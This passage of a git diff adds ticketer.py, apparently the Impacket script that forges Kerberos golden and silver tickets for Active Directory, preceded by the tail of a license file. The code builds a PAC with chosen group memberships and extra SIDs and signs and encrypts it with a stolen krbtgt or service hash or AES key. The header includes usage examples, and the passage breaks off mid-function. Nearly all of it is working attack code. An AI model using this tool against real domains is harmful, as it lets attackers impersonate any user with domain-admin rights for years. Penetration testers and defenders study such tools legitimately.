without any express or implied +warranty. In no event will the author be held liable for any damages +arising from the use of this software. + +Permission is granted to anyone to use this software for any purpose, +including commercial applications, and to alter it and redistribute it +freely, subject to the following restrictions: + +1. The origin of this software must not be misrepresented; you must + not claim that you wrote the original software. If you use this + software in a product, an acknowledgment in the product + documentation would be appreciated but is not required. + +2. Altered source versions must be plainly marked as such, and must + not be misrepresented as being the original software. + +3. This notice cannot be removed or altered from any source + distribution. diff --git a/ade/attacks/ticketer/__init__.py b/ade/attacks/ticketer/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/ade/attacks/ticketer/ticketer.py b/ade/attacks/ticketer/ticketer.py new file mode 100644 index 0000000..13dbba3 --- /dev/null +++ b/ade/attacks/ticketer/ticketer.py @@ -0,0 +1,818 @@ +#!/usr/bin/env python3 +# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Author: +# Alberto Solino (@agsolino) +# +# Description: +# This script will create TGT/TGS tickets from scratch or based on a template (legally requested from the KDC) +# allowing you to customize some of the parameters set inside the PAC_LOGON_INFO structure, in particular the +# groups, extrasids, etc. +# Tickets duration is fixed to 10 years from now (although you can manually change it) +# +# References: +# Original presentation at BlackHat USA 2014 by @gentilkiwi and @passingthehash: +# (https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it) +# Original implementation by Benjamin Delpy (@gentilkiwi) in mimikatz +# (https://github.com/gentilkiwi/mimikatz) +# +# Examples: +# ./ticketer.py -nthash -domain-sid -domain baduser +# +# will create and save a golden ticket for user 'baduser' that will be all encrypted/signed used RC4. +# If you specify -aesKey instead of -ntHash everything will be encrypted using AES128 or AES256 +# (depending on the key specified). No traffic is generated against the KDC. Ticket will be saved as +# baduser.ccache. +# +# ./ticketer.py -nthash -aesKey -domain-sid -domain +# -request -user -password baduser +# +# will first authenticate against the KDC (using -user/-password) and get a TGT that will be used +# as template for customization. Whatever encryption algorithms used on that ticket will be honored, +# hence you might need to specify both -nthash and -aesKey data. Ticket will be generated for 'baduser' and saved +# as baduser.ccache. +# +# ToDo: +# [X] Silver tickets still not implemented - DONE by @machosec and fixes by @br4nsh +# [ ] When -request is specified, we could ask for a user2user ticket and also populate the received PAC +# +from __future__ import division +from __future__ import print_function +import argparse +import datetime +import logging +import random +import string +import sys +from calendar import timegm +from time import strptime +from binascii import unhexlify + +from pyasn1.codec.der import encoder, decoder +from pyasn1.type.univ import noValue + +from impacket import version +from impacket.dcerpc.v5.dtypes import RPC_SID +from impacket.dcerpc.v5.ndr import NDRULONG +from impacket.dcerpc.v5.samr import NULL, GROUP_MEMBERSHIP, SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, \ + SE_GROUP_ENABLED, USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD +from impacket.examples import logger +from impacket.krb5.asn1 import AS_REP, TGS_REP, ETYPE_INFO2, AuthorizationData, EncTicketPart, EncASRepPart, EncTGSRepPart +from impacket.krb5.constants import ApplicationTagNumbers, PreAuthenticationDataTypes, EncryptionTypes, \ + PrincipalNameType, ProtocolVersionNumber, TicketFlags, encodeFlags, ChecksumTypes, AuthorizationDataType, \ + KERB_NON_KERB_CKSUM_SALT +from impacket.krb5.keytab import Keytab +from impacket.krb5.crypto import Key, _enctype_table +from impacket.krb5.crypto import _checksum_table, Enctype +from impacket.krb5.pac import KERB_SID_AND_ATTRIBUTES, PAC_SIGNATURE_DATA, PAC_INFO_BUFFER, PAC_LOGON_INFO, \ + PAC_CLIENT_INFO_TYPE, PAC_SERVER_CHECKSUM, PAC_PRIVSVR_CHECKSUM, PACTYPE, PKERB_SID_AND_ATTRIBUTES_ARRAY, \ + VALIDATION_INFO, PAC_CLIENT_INFO, KERB_VALIDATION_INFO +from impacket.krb5.types import KerberosTime, Principal +from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS + + +class TICKETER: + def __init__(self, target, password, domain, options): + self.__password = password + self.__target = target + self.__domain = domain + self.__options = options + if options.spn: + spn = options.spn.split('/') + self.__service = spn[0] + self.__server = spn[1] + if options.keytab is not None: + self.loadKeysFromKeytab(options.keytab) + + # we are creating a golden ticket + else: + self.__service = 'krbtgt' + self.__server = self.__domain + + @staticmethod + def getFileTime(t): + t *= 10000000 + t += 116444736000000000 + return t + + def loadKeysFromKeytab(self, filename): + keytab = Keytab.loadFile(filename) + keyblock = keytab.getKey("%s@%s" % (options.spn, self.__domain)) + if keyblock: + if keyblock["keytype"] == Enctype.AES256 or keyblock["keytype"] == Enctype.AES128: + options.aesKey = keyblock.hexlifiedValue() + elif keyblock["keytype"] == Enctype.RC4: + options.nthash = keyblock.hexlifiedValue() + else: + logging.warning("No matching key for SPN '%s' in given keytab found!", options.spn) + + def createBasicValidationInfo(self): + # 1) KERB_VALIDATION_INFO + kerbdata = KERB_VALIDATION_INFO() + + aTime = timegm(datetime.datetime.utcnow().timetuple()) + unixTime = self.getFileTime(aTime) + + kerbdata['LogonTime']['dwLowDateTime'] = unixTime & 0xffffffff + kerbdata['LogonTime']['dwHighDateTime'] = unixTime >> 32 + + # LogoffTime: A FILETIME structure that contains the time the client's logon + # session should expire. If the session should not expire, this structure + # SHOULD have the dwHighDateTime member set to 0x7FFFFFFF and the dwLowDateTime + # member set to 0xFFFFFFFF. A recipient of the PAC SHOULD<7> use this value as + # an indicator of when to warn the user that the allowed time is due to expire. + kerbdata['LogoffTime']['dwLowDateTime'] = 0xFFFFFFFF + kerbdata['LogoffTime']['dwHighDateTime'] = 0x7FFFFFFF + + # KickOffTime: A FILETIME structure that contains LogoffTime minus the user + # account's forceLogoff attribute ([MS-ADA1] section 2.233) value. If the + # client should not be logged off, this structure SHOULD have the dwHighDateTime + # member set to 0x7FFFFFFF and the dwLowDateTime member set to 0xFFFFFFFF. + # The Kerberos service ticket end time is a replacement for KickOffTime. + # The service ticket lifetime SHOULD NOT be set longer than the KickOffTime of + # an account. A recipient of the PAC SHOULD<8> use this value as the indicator + # of when the client should be forcibly disconnected. + kerbdata['KickOffTime']['dwLowDateTime'] = 0xFFFFFFFF + kerbdata['KickOffTime']['dwHighDateTime'] = 0x7FFFFFFF + + kerbdata['PasswordLastSet']['dwLowDateTime'] = unixTime & 0xffffffff + kerbdata['PasswordLastSet']['dwHighDateTime'] = unixTime >> 32 + + kerbdata['PasswordCanChange']['dwLowDateTime'] = 0 + kerbdata['PasswordCanChange']['dwHighDateTime'] = 0 + + # PasswordMustChange: A FILETIME structure that contains the time at which + # theclient's password expires. If the password will not expire, this + # structure MUST have the dwHighDateTime member set to 0x7FFFFFFF and the + # dwLowDateTime member set to 0xFFFFFFFF. + kerbdata['PasswordMustChange']['dwLowDateTime'] = 0xFFFFFFFF + kerbdata['PasswordMustChange']['dwHighDateTime'] = 0x7FFFFFFF + + kerbdata['EffectiveName'] = self.__target + kerbdata['FullName'] = '' + kerbdata['LogonScript'] = '' + kerbdata['ProfilePath'] = '' + kerbdata['HomeDirectory'] = '' + kerbdata['HomeDirectoryDrive'] = '' + kerbdata['LogonCount'] = 500 + kerbdata['BadPasswordCount'] = 0 + kerbdata['UserId'] = int(self.__options.user_id) + kerbdata['PrimaryGroupId'] = 513 + + # Our Golden Well-known groups! :) + groups = self.__options.groups.split(',') + kerbdata['GroupCount'] = len(groups) + + for group in groups: + groupMembership = GROUP_MEMBERSHIP() + groupId = NDRULONG() + groupId['Data'] = int(group) + groupMembership['RelativeId'] = groupId + groupMembership['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED + kerbdata['GroupIds'].append(groupMembership) + + kerbdata['UserFlags'] = 0 + kerbdata['UserSessionKey'] = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + kerbdata['LogonServer'] = '' + kerbdata['LogonDomainName'] = self.__domain.upper() + kerbdata['LogonDomainId'].fromCanonical(self.__options.domain_sid) + kerbdata['LMKey'] = b'\x00\x00\x00\x00\x00\x00\x00\x00' + kerbdata['UserAccountControl'] = USER_NORMAL_ACCOUNT | USER_DONT_EXPIRE_PASSWORD + kerbdata['SubAuthStatus'] = 0 + kerbdata['LastSuccessfulILogon']['dwLowDateTime'] = 0 + kerbdata['LastSuccessfulILogon']['dwHighDateTime'] = 0 + kerbdata['LastFailedILogon']['dwLowDateTime'] = 0 + kerbdata['LastFailedILogon']['dwHighDateTime'] = 0 + kerbdata['FailedILogonCount'] = 0 + kerbdata['Reserved3'] = 0 + + kerbdata['ResourceGroupDomainSid'] = NULL + kerbdata['ResourceGroupCount'] = 0 + kerbdata['ResourceGroupIds'] = NULL + + validationInfo = VALIDATION_INFO() + validationInfo['Data'] = kerbdata + + return validationInfo + + def createBasicPac(self, kdcRep): + validationInfo = self.createBasicValidationInfo() + pacInfos = {} + pacInfos[PAC_LOGON_INFO] = validationInfo.getData() + validationInfo.getDataReferents() + srvCheckSum = PAC_SIGNATURE_DATA() + privCheckSum = PAC_SIGNATURE_DATA() + + if kdcRep['ticket']['enc-part']['etype'] == EncryptionTypes.rc4_hmac.value: + srvCheckSum['SignatureType'] = ChecksumTypes.hmac_md5.value + privCheckSum['SignatureType'] = ChecksumTypes.hmac_md5.value + srvCheckSum['Signature'] = b'\x00' * 16 + privCheckSum['Signature'] = b'\x00' * 16 + else: + srvCheckSum['Signature'] = b'\x00' * 12 + privCheckSum['Signature'] = b'\x00' * 12 + if len(self.__options.aesKey) == 64: + srvCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes256.value + privCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes256.value + else: + srvCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes128.value + privCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes128.value + + pacInfos[PAC_SERVER_CHECKSUM] = srvCheckSum.getData() + pacInfos[PAC_PRIVSVR_CHECKSUM] = privCheckSum.getData() + + clientInfo = PAC_CLIENT_INFO() + clientInfo['Name'] = self.__target.encode('utf-16le') + clientInfo['NameLength'] = len(clientInfo['Name']) + pacInfos[PAC_CLIENT_INFO_TYPE] = clientInfo.getData() + + return pacInfos + + def createBasicTicket(self): + if self.__options.request is True: + if self.__domain == self.__server: + logging.info('Requesting TGT to target domain to use as basis') + else: + logging.info('Requesting TGT/TGS to target domain to use as basis') + + if self.__options.hashes is not None: + lmhash, nthash = self.__options.hashes.split(':') + else: + lmhash = '' + nthash = '' + userName = Principal(self.__options.user, type=PrincipalNameType.NT_PRINCIPAL.value) + tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain, + unhexlify(lmhash), unhexlify(nthash), None, + self.__options.dc_ip) + if self.__domain == self.__server: + kdcRep = decoder.decode(tgt, asn1Spec=AS_REP())[0] + else: + serverName = Principal(self.__options.spn, type=PrincipalNameType.NT_SRV_INST.value) + tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.__domain, None, tgt, cipher, + sessionKey) + kdcRep = decoder.decode(tgs, asn1Spec=TGS_REP())[0] + + # Let's check we have all the necessary data based on the ciphers used. Boring checks + ticketCipher = int(kdcRep['ticket']['enc-part']['etype']) + encPartCipher = int(kdcRep['enc-part']['etype']) + + if (ticketCipher == EncryptionTypes.rc4_hmac.value or encPartCipher == EncryptionTypes.rc4_hmac.value) and \ + self.__options.nthash is None: + logging.critical('rc4_hmac is used in this ticket and you haven\'t specified the -nthash parameter. ' + 'Can\'t continue ( or try running again w/o the -request option)') + return None, None + + if (ticketCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value or + encPartCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value) and \ + self.__options.aesKey is None: + logging.critical( + 'aes128_cts_hmac_sha1_96 is used in this ticket and you haven\'t specified the -aesKey parameter. ' + 'Can\'t continue (or try running again w/o the -request option)') + return None, None + + if (ticketCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value or + encPartCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value) and \ + self.__options.aesKey is not None and len(self.__options.aesKey) > 32: + logging.critical( + 'aes128_cts_hmac_sha1_96 is used in this ticket and the -aesKey you specified is not aes128. ' + 'Can\'t continue (or try running again w/o the -request option)') + return None, None + + if (ticketCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value or + encPartCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value) and self.__options.aesKey is None: + logging.critical( + 'aes256_cts_hmac_sha1_96 is used in this ticket and you haven\'t specified the -aesKey parameter. ' + 'Can\'t continue (or try running again w/o the -request option)') + return None, None + + if ( ticketCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value or + encPartCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value) and \ + self.__options.aesKey is not None and len(self.__options.aesKey) < 64: + logging.critical( + 'aes256_cts_hmac_sha1_96 is used in this ticket and the -aesKey you specified is not aes256. ' + 'Can\'t continue') + return None, None + kdcRep['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value + kdcRep['cname']['name-string'] = noValue + kdcRep['cname']['name-string'][0] = self.__target + + else: + logging.info('Creating basic skeleton ticket and PAC Infos') + if self.__domain == self.__server: + kdcRep = AS_REP() + kdcRep['msg-type'] = ApplicationTagNumbers.AS_REP.value + else: + kdcRep = TGS_REP() + kdcRep['msg-type'] = ApplicationTagNumbers.TGS_REP.value + kdcRep['pvno'] = 5 + if self.__options.nthash is None: + kdcRep['padata'] = noValue + kdcRep['padata'][0] = noValue + kdcRep['padata'][0]['padata-type'] = PreAuthenticationDataTypes.PA_ETYPE_INFO2.value + + etype2 = ETYPE_INFO2() + etype2[0] = noValue + if len(self.__options.aesKey) == 64: + etype2[0]['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value + else: + etype2[0]['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value + etype2[0]['salt'] = '%s%s' % (self.__domain.upper(), self.__target) + encodedEtype2 = encoder.encode(etype2) + + kdcRep['padata'][0]['padata-value'] = encodedEtype2 + + kdcRep['crealm'] = self.__domain.upper() + kdcRep['cname'] = noValue + kdcRep['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value + kdcRep['cname']['name-string'] = noValue + kdcRep['cname']['name-string'][0] = self.__target + + kdcRep['ticket'] = noValue + kdcRep['ticket']['tkt-vno'] = ProtocolVersionNumber.pvno.value + kdcRep['ticket']['realm'] = self.__domain.upper() + kdcRep['ticket']['sname'] = noValue + kdcRep['ticket']['sname']['name-string'] = noValue + kdcRep['ticket']['sname']['name-string'][0] = self.__service + + if self.__domain == self.__server: + kdcRep['ticket']['sname']['name-type'] = PrincipalNameType.NT_SRV_INST.value + kdcRep['ticket']['sname']['name-string'][1] = self.__domain.upper() + else: + kdcRep['ticket']['sname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value + kdcRep['ticket']['sname']['name-string'][1] = self.__server + + kdcRep['ticket']['enc-part'] = noValue + kdcRep['ticket']['enc-part']['kvno'] = 2 + kdcRep['enc-part'] = noValue + if self.__options.nthash is None: + if len(self.__options.aesKey) == 64: + kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value + kdcRep['enc-part']['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value + else: + kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value + kdcRep['enc-part']['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value + else: + kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.rc4_hmac.value + kdcRep['enc-part']['etype'] = EncryptionTypes.rc4_hmac.value + + kdcRep['enc-part']['kvno'] = 2 + kdcRep['enc-part']['cipher'] = noValue + + pacInfos = self.createBasicPac(kdcRep) + + return kdcRep, pacInfos + + def customizeTicket(self, kdcRep, pacInfos): + logging.info('Customizing ticket for %s/%s' % (self.__domain, self.__target)) + encTicketPart = EncTicketPart() + + flags = list() + flags.append(TicketFlags.forwardable.value) + flags.append(TicketFlags.proxiable.value) + flags.append(TicketFlags.renewable.value) + if self.__domain == self.__server: + flags.append(TicketFlags.initial.value) + flags.append(TicketFlags.pre_authent.value) + encTicketPart['flags'] = encodeFlags(flags) + encTicketPart['key'] = noValue + encTicketPart['key']['keytype'] = kdcRep['ticket']['enc-part']['etype'] + + if encTicketPart['key']['keytype'] == EncryptionTypes.aes128_cts_hmac_sha1_96.value: + encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)]) + elif encTicketPart['key']['keytype'] == EncryptionTypes.aes256_cts_hmac_sha1_96.value: + encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(32)]) + else: + encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)]) + + encTicketPart['crealm'] = self.__domain.upper() + encTicketPart['cname'] = noValue + encTicketPart['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value + encTicketPart['cname']['name-string'] = noValue + encTicketPart['cname']['name-string'][0] = self.__target + + encTicketPart['transited'] = noValue + encTicketPart['transited']['tr-type'] = 0 + encTicketPart['transited']['contents'] = '' + + encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow()) + encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow()) + # Let's extend the ticket's validity a lil bit + ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(days=int(self.__options.duration)) + encTicketPart['endtime'] = KerberosTime.to_asn1(ticketDuration) + encTicketPart['renew-till'] = KerberosTime.to_asn1(ticketDuration) + encTicketPart['authorization-data'] = noValue + encTicketPart['authorization-data'][0] = noValue + encTicketPart['authorization-data'][0]['ad-type'] = AuthorizationDataType.AD_IF_RELEVANT.value + encTicketPart['authorization-data'][0]['ad-data'] = noValue + + # Let's locate the KERB_VALIDATION_INFO and Checksums + if PAC_LOGON_INFO in pacInfos: + data = pacInfos[PAC_LOGON_INFO] + validationInfo = VALIDATION_INFO() + validationInfo.fromString(pacInfos[PAC_LOGON_INFO]) + lenVal = len(validationInfo.getData()) + validationInfo.fromStringReferents(data, lenVal) + + aTime = timegm(strptime(str(encTicketPart['authtime']), '%Y%m%d%H%M%SZ')) + + unixTime = self.getFileTime(aTime) + + kerbdata = KERB_VALIDATION_INFO() + + kerbdata['LogonTime']['dwLowDateTime'] = unixTime & 0xffffffff + kerbdata['LogonTime']['dwHighDateTime'] = unixTime >> 32 + + # Let's adjust username and other data + validationInfo['Data']['LogonDomainName'] = self.__domain.upper() + validationInfo['Data']['EffectiveName'] = self.__target + # Our Golden Well-known groups! :) + groups = self.__options.groups.split(',') + validationInfo['Data']['GroupIds'] = list() + validationInfo['Data']['GroupCount'] = len(groups) + + for group in groups: + groupMembership = GROUP_MEMBERSHIP() + groupId = NDRULONG() + groupId['Data'] = int(group) + groupMembership['RelativeId'] = groupId + groupMembership['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED + validationInfo['Data']['GroupIds'].append(groupMembership) + + # Let's add the extraSid + if self.__options.extra_sid is not None: + extrasids = self.__options.extra_sid.split(',') + if validationInfo['Data']['SidCount'] == 0: + # Let's be sure user's flag specify we have extra sids. + validationInfo['Data']['UserFlags'] |= 0x20 + validationInfo['Data']['ExtraSids'] = PKERB_SID_AND_ATTRIBUTES_ARRAY() + for extrasid in extrasids: + validationInfo['Data']['SidCount'] += 1 + + sidRecord = KERB_SID_AND_ATTRIBUTES() + + sid = RPC_SID() + sid.fromCanonical(extrasid) + + sidRecord['Sid'] = sid + sidRecord['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED + + # And, let's append the magicSid + validationInfo['Data']['ExtraSids'].append(sidRecord) + else: + validationInfo['Data']['ExtraSids'] = NULL + + validationInfoBlob = validationInfo.getData() + validationInfo.getDataReferents() + pacInfos[PAC_LOGON_INFO] = validationInfoBlob + + if logging.getLogger().level == logging.DEBUG: + logging.debug('VALIDATION_INFO after making it gold') + validationInfo.dump() + print ('\n') + else: + raise Exception('PAC_LOGON_INFO not found! Aborting') + + logging.info('\tPAC_LOGON_INFO') + + # Let's now clear the checksums + if PAC_SERVER_CHECKSUM in pacInfos: + serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM]) + if serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value: + serverChecksum['Signature'] = '\x00' * 12 + elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value: + serverChecksum['Signature'] = '\x00' * 12 + else: + serverChecksum['Signature'] = '\x00' * 16 + pacInfos[PAC_SERVER_CHECKSUM] = serverChecksum.getData() + else: + raise Exception('PAC_SERVER_CHECKSUM not found! Aborting') + + if PAC_PRIVSVR_CHECKSUM in pacInfos: + privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM]) + privSvrChecksum['Signature'] = '\x00' * 12 + if privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value: + privSvrChecksum['Signature'] = '\x00' * 12 + elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value: + privSvrChecksum['Signature'] = '\x00' * 12 + else: + privSvrChecksum['Signature'] = '\x00' * 16 + pacInfos[PAC_PRIVSVR_CHECKSUM] = privSvrChecksum.getData() + else: + raise Exception('PAC_PRIVSVR_CHECKSUM not found! Aborting') + + if PAC_CLIENT_INFO_TYPE in pacInfos: + pacClientInfo = PAC_CLIENT_INFO(pacInfos[PAC_CLIENT_INFO_TYPE]) + pacClientInfo['ClientId'] = unixTime + pacInfos[PAC_CLIENT_INFO_TYPE] = pacClientInfo.getData() + else: + raise Exception('PAC_CLIENT_INFO_TYPE not found! Aborting') + + logging.info('\tPAC_CLIENT_INFO_TYPE') + logging.info('\tEncTicketPart') + + if self.__domain == self.__server: + encRepPart = EncASRepPart() + else: + encRepPart = EncTGSRepPart() + + encRepPart['key'] = noValue + encRepPart['key']['keytype'] = encTicketPart['key']['keytype'] + encRepPart['key']['keyvalue'] = encTicketPart['key']['keyvalue'] + encRepPart['last-req'] = noValue + encRepPart['last-req'][0] = noValue + encRepPart['last-req'][0]['lr-type'] = 0 + encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow()) + encRepPart['nonce'] = 123456789 + encRepPart['key-expiration'] = KerberosTime.to_asn1(ticketDuration) + encRepPart['flags'] = encodeFlags(flags) + encRepPart['authtime'] = str(encTicketPart['authtime']) + encRepPart['endtime'] = str(encTicketPart['endtime']) + encRepPart['starttime'] = str(encTicketPart['starttime']) + encRepPart['renew-till'] = str(encTicketPart['renew-till']) + encRepPart['srealm'] = self.__domain.upper() + encRepPart['sname'] = noValue + encRepPart['sname']['name-string'] = noValue + encRepPart['sname']['name-string'][0] = self.__service + + if self.__domain == self.__server: + encRepPart['sname']['name-type'] = PrincipalNameType.NT_SRV_INST.value + encRepPart['sname']['name-string'][1] = self.__domain.upper() + logging.info('\tEncAsRepPart') + else: + encRepPart['sname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value + encRepPart['sname']['name-string'][1] = self.__server + logging.info('\tEncTGSRepPart') + + return encRepPart, encTicketPart, pacInfos + + def signEncryptTicket(self, kdcRep, encASorTGSRepPart, encTicketPart, pacInfos): + logging.info('Signing/Encrypting final ticket') + + # We changed everything we needed to make us special. Now let's repack and calculate checksums + validationInfoBlob = pacInfos[PAC_LOGON_INFO] + validationInfoAlignment = b'\x00' * (((len(validationInfoBlob) + 7) // 8 * 8) - len(validationInfoBlob)) + + pacClientInfoBlob = pacInfos[PAC_CLIENT_INFO_TYPE] + pacClientInfoAlignment = b'\x00' * (((len(pacClientInfoBlob) + 7) // 8 * 8) - len(pacClientInfoBlob)) + + serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM]) + serverChecksumBlob = pacInfos[PAC_SERVER_CHECKSUM] + serverChecksumAlignment = b'\x00' * (((len(serverChecksumBlob) + 7) // 8 * 8) - len(serverChecksumBlob)) + + privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM]) + privSvrChecksumBlob = pacInfos[PAC_PRIVSVR_CHECKSUM] + privSvrChecksumAlignment = b'\x00' * (((len(privSvrChecksumBlob) + 7) // 8 * 8) - len(privSvrChecksumBlob)) + + # The offset are set from the beginning of the PAC_TYPE + # [MS-PAC] 2.4 PAC_INFO_BUFFER + offsetData = 8 + len(PAC_INFO_BUFFER().getData()) * 4 + + # Let's build the PAC_INFO_BUFFER for each one of the elements + validationInfoIB = PAC_INFO_BUFFER() + validationInfoIB['ulType'] = PAC_LOGON_INFO + validationInfoIB['cbBufferSize'] = len(validationInfoBlob) + validationInfoIB['Offset'] = offsetData + offsetData = (offsetData + validationInfoIB['cbBufferSize'] + 7) // 8 * 8 + + pacClientInfoIB = PAC_INFO_BUFFER() + pacClientInfoIB['ulType'] = PAC_CLIENT_INFO_TYPE + pacClientInfoIB['cbBufferSize'] = len(pacClientInfoBlob) + pacClientInfoIB['Offset'] = offsetData + offsetData = (offsetData + pacClientInfoIB['cbBufferSize'] + 7) // 8 * 8 + + serverChecksumIB = PAC_INFO_BUFFER() + serverChecksumIB['ulType'] = PAC_SERVER_CHECKSUM + serverChecksumIB['cbBufferSize'] = len(serverChecksumBlob) + serverChecksumIB['Offset'] = offsetData + offsetData = (offsetData + serverChecksumIB['cbBufferSize'] + 7) // 8 * 8 + + privSvrChecksumIB = PAC_INFO_BUFFER() + privSvrChecksumIB['ulType'] = PAC_PRIVSVR_CHECKSUM + privSvrChecksumIB['cbBufferSize'] = len(privSvrChecksumBlob) + privSvrChecksumIB['Offset'] = offsetData + # offsetData = (offsetData+privSvrChecksumIB['cbBufferSize'] + 7) //8 *8 + + # Building the PAC_TYPE as specified in [MS-PAC] + buffers = validationInfoIB.getData() + pacClientInfoIB.getData() + serverChecksumIB.getData() + \ + privSvrChecksumIB.getData() + validationInfoBlob + validationInfoAlignment + \ + pacInfos[PAC_CLIENT_INFO_TYPE] + pacClientInfoAlignment + buffersTail = serverChecksumBlob + serverChecksumAlignment + privSvrChecksum.getData() + privSvrChecksumAlignment + + pacType = PACTYPE() + pacType['cBuffers'] = 4 + pacType['Version'] = 0 + pacType['Buffers'] = buffers + buffersTail + + blobToChecksum = pacType.getData() + + checkSumFunctionServer = _checksum_table[serverChecksum['SignatureType']] + if serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value: + keyServer = Key(Enctype.AES256, unhexlify(self.__options.aesKey)) + elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value: + keyServer = Key(Enctype.AES128, unhexlify(self.__options.aesKey)) + elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_md5.value: + keyServer = Key(Enctype.RC4, unhexlify(self.__options.nthash)) + else: + raise Exception('Invalid Server checksum type 0x%x' % serverChecksum['SignatureType']) + + checkSumFunctionPriv = _checksum_table[privSvrChecksum['SignatureType']] + if privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value: + keyPriv = Key(Enctype.AES256, unhexlify(self.__options.aesKey)) + elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value: + keyPriv = Key(Enctype.AES128, unhexlify(self.__options.aesKey)) + elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_md5.value: + keyPriv = Key(Enctype.RC4, unhexlify(self.__options.nthash)) + else: + raise Exception('Invalid Priv checksum type 0x%x' % serverChecksum['SignatureType']) + + serverChecksum['Signature'] = checkSumFunctionServer.checksum(keyServer, KERB_NON_KERB_CKSUM_SALT, blobToChecksum) + logging.info('\tPAC_SERVER_CHECKSUM') + privSvrChecksum['Signature'] = checkSumFunctionPriv.checksum(keyPriv, KERB_NON_KERB_CKSUM_SALT, serverChecksum['Signature']) + logging.info('\tPAC_PRIVSVR_CHECKSUM') + + buffersTail = serverChecksum.getData() + serverChecksumAlignment + privSvrChecksum.getData() + privSvrChecksumAlignment + pacType['Buffers'] = buffers + buffersTail + + authorizationData = AuthorizationData() + authorizationData[0] = noValue + authorizationData[0]['ad-type'] = AuthorizationDataType.AD_WIN2K_PAC.value + authorizationData[0]['ad-data'] = pacType.getData() + authorizationData = encoder.encode(authorizationData) + + encTicketPart['authorization-data'][0]['ad-data'] = authorizationData + + if logging.getLogger().level == logging.DEBUG: + logging.debug('Customized EncTicketPart') + print(encTicketPart.prettyPrint()) + print ('\n') + + encodedEncTicketPart = encoder.encode(encTicketPart) + + cipher = _enctype_table[kdcRep['ticket']['enc-part']['etype']] + if cipher.enctype == EncryptionTypes.aes256_cts_hmac_sha1_96.value: + key = Key(cipher.enctype, unhexlify(self.__options.aesKey)) + elif cipher.enctype == EncryptionTypes.aes128_cts_hmac_sha1_96.value: + key = Key(cipher.enctype, unhexlify(self.__options.aesKey)) + elif cipher.enctype == EncryptionTypes.rc4_hmac.value: + key = Key(cipher.enctype, unhexlify(self.__options.nthash)) + else: + raise Exception('Unsupported enctype 0x%x' % cipher.enctype) + + # Key Usage 2 + # AS-REP Ticket and TGS-REP Ticket (includes TGS session + # key or application session key), encrypted with the + # service key (Section 5.3) + logging.info('\tEncTicketPart') + cipherText = cipher.encrypt(key, 2, encodedEncTicketPart, None) + + kdcRep['ticket']['enc-part']['cipher'] = cipherText + kdcRep['ticket']['enc-part']['kvno'] = 2 + + # Lastly.. we have to encrypt the 